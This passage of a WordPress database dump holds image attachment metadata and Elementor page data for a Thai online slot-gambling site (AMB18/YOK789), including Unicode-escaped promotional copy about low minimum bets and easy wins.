s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2651,361,'_wp_attached_file','2026/02/pragmatic-1.webp'),(2652,361,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:651;s:6:\"height\";i:500;s:4:\"file\";s:24:\"2026/02/pragmatic-1.webp\";s:8:\"filesize\";i:85560;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"pragmatic-1-300x230.webp\";s:5:\"width\";i:300;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:27898;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"pragmatic-1-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14734;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2653,362,'_wp_attached_file','2026/02/Reward-10_-Banner-AMB18.webp'),(2654,362,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:36:\"2026/02/Reward-10_-Banner-AMB18.webp\";s:8:\"filesize\";i:95560;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:36:\"Reward-10_-Banner-AMB18-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12338;}s:5:\"large\";a:5:{s:4:\"file\";s:37:\"Reward-10_-Banner-AMB18-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:66628;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"Reward-10_-Banner-AMB18-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7110;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:36:\"Reward-10_-Banner-AMB18-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:46298;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2655,363,'_wp_attached_file','2026/02/Slot-NO1-AMB18.webp'),(2656,363,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:27:\"2026/02/Slot-NO1-AMB18.webp\";s:8:\"filesize\";i:112900;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"Slot-NO1-AMB18-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:25268;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"Slot-NO1-AMB18-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8632;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"Slot-NO1-AMB18-768x768.webp\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:91088;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2657,364,'_wp_attached_file','2026/02/Slot-xo-1.webp'),(2658,364,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:314;s:6:\"height\";i:500;s:4:\"file\";s:22:\"2026/02/Slot-xo-1.webp\";s:8:\"filesize\";i:53322;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"Slot-xo-1-188x300.webp\";s:5:\"width\";i:188;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:22902;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"Slot-xo-1-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11464;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2659,365,'_wp_attached_file','2026/02/True-wallet-AMB18.webp'),(2660,365,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:30:\"2026/02/True-wallet-AMB18.webp\";s:8:\"filesize\";i:108178;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"True-wallet-AMB18-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:24482;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"True-wallet-AMB18-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8570;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:30:\"True-wallet-AMB18-768x768.webp\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:87114;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2661,366,'_wp_attached_file','2026/02/cropped-AMB18-logo-scaled-1.webp'),(2662,366,'_wp_attachment_context','custom-logo'),(2663,366,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2558;s:6:\"height\";i:979;s:4:\"file\";s:40:\"2026/02/cropped-AMB18-logo-scaled-1.webp\";s:8:\"filesize\";i:33372;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"cropped-AMB18-logo-scaled-1-300x115.webp\";s:5:\"width\";i:300;s:6:\"height\";i:115;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4262;}s:5:\"large\";a:5:{s:4:\"file\";s:41:\"cropped-AMB18-logo-scaled-1-1024x392.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:392;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12896;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"cropped-AMB18-logo-scaled-1-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:1624;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:40:\"cropped-AMB18-logo-scaled-1-768x294.webp\";s:5:\"width\";i:768;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9964;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:41:\"cropped-AMB18-logo-scaled-1-1536x588.webp\";s:5:\"width\";i:1536;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:19438;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:41:\"cropped-AMB18-logo-scaled-1-2048x784.webp\";s:5:\"width\";i:2048;s:6:\"height\";i:784;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:26276;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2665,368,'_wp_attachment_image_alt','AMB18'),(2666,368,'_wp_attached_file','2026/02/cropped-512-AMB18.webp'),(2667,368,'_wp_attachment_context','site-icon'),(2668,368,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:30:\"2026/02/cropped-512-AMB18.webp\";s:8:\"filesize\";i:7638;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"cropped-512-AMB18-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4506;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"cropped-512-AMB18-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2454;}s:13:\"site_icon-270\";a:5:{s:4:\"file\";s:30:\"cropped-512-AMB18-270x270.webp\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3964;}s:13:\"site_icon-192\";a:5:{s:4:\"file\";s:30:\"cropped-512-AMB18-192x192.webp\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3044;}s:13:\"site_icon-180\";a:5:{s:4:\"file\";s:30:\"cropped-512-AMB18-180x180.webp\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2860;}s:12:\"site_icon-32\";a:5:{s:4:\"file\";s:28:\"cropped-512-AMB18-32x32.webp\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:582;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2671,46,'_wp_old_date','2026-02-24'),(2672,41,'_wp_old_date','2026-02-24'),(2673,40,'_wp_old_date','2026-02-24'),(2674,39,'_wp_old_date','2026-02-24'),(2675,38,'_wp_old_date','2026-02-24'),(2676,369,'_wp_attached_file','2026/02/Slot-direct-website-2025-AMB18.webp'),(2677,369,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:800;s:4:\"file\";s:43:\"2026/02/Slot-direct-website-2025-AMB18.webp\";s:8:\"filesize\";i:232684;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:43:\"Slot-direct-website-2025-AMB18-300x150.webp\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:20206;}s:5:\"large\";a:5:{s:4:\"file\";s:44:\"Slot-direct-website-2025-AMB18-1024x512.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:117378;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:43:\"Slot-direct-website-2025-AMB18-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11600;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:43:\"Slot-direct-website-2025-AMB18-768x384.webp\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:79484;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:44:\"Slot-direct-website-2025-AMB18-1536x768.webp\";s:5:\"width\";i:1536;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:195500;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2678,370,'_wp_attached_file','2026/02/Slot-direct-website-goodweb-bonus-AMB18.webp'),(2679,370,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:800;s:4:\"file\";s:52:\"2026/02/Slot-direct-website-goodweb-bonus-AMB18.webp\";s:8:\"filesize\";i:215240;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:52:\"Slot-direct-website-goodweb-bonus-AMB18-300x150.webp\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:18858;}s:5:\"large\";a:5:{s:4:\"file\";s:53:\"Slot-direct-website-goodweb-bonus-AMB18-1024x512.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:106758;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:52:\"Slot-direct-website-goodweb-bonus-AMB18-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10822;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:52:\"Slot-direct-website-goodweb-bonus-AMB18-768x384.webp\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:72982;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:53:\"Slot-direct-website-goodweb-bonus-AMB18-1536x768.webp\";s:5:\"width\";i:1536;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:180788;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2680,371,'_wp_attached_file','2026/02/Web-slot-bet-1-baht-AMB18.webp'),(2681,371,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2026/02/Web-slot-bet-1-baht-AMB18.webp\";s:8:\"filesize\";i:191312;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"Web-slot-bet-1-baht-AMB18-300x150.webp\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:18114;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"Web-slot-bet-1-baht-AMB18-1024x512.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:97628;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"Web-slot-bet-1-baht-AMB18-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10536;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"Web-slot-bet-1-baht-AMB18-768x384.webp\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:68576;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"Web-slot-bet-1-baht-AMB18-1536x768.webp\";s:5:\"width\";i:1536;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:163402;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2682,371,'_wp_attachment_image_alt','AMB18'),(2683,372,'_thumbnail_id','371'),(2684,372,'_elementor_edit_mode','builder'),(2685,372,'_elementor_template_type','wp-page'),(2686,372,'_elementor_version','3.35.5'),(2687,372,'_elementor_pro_version','3.32.3'),(2688,372,'_wp_page_template','default'),(2689,372,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2690,372,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-Yok789.webp\",\"id\":274,\"size\":\"\",\"alt\":\"YOK789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-Yok789.webp\",\"id\":278,\"size\":\"\",\"alt\":\"Yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e19\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 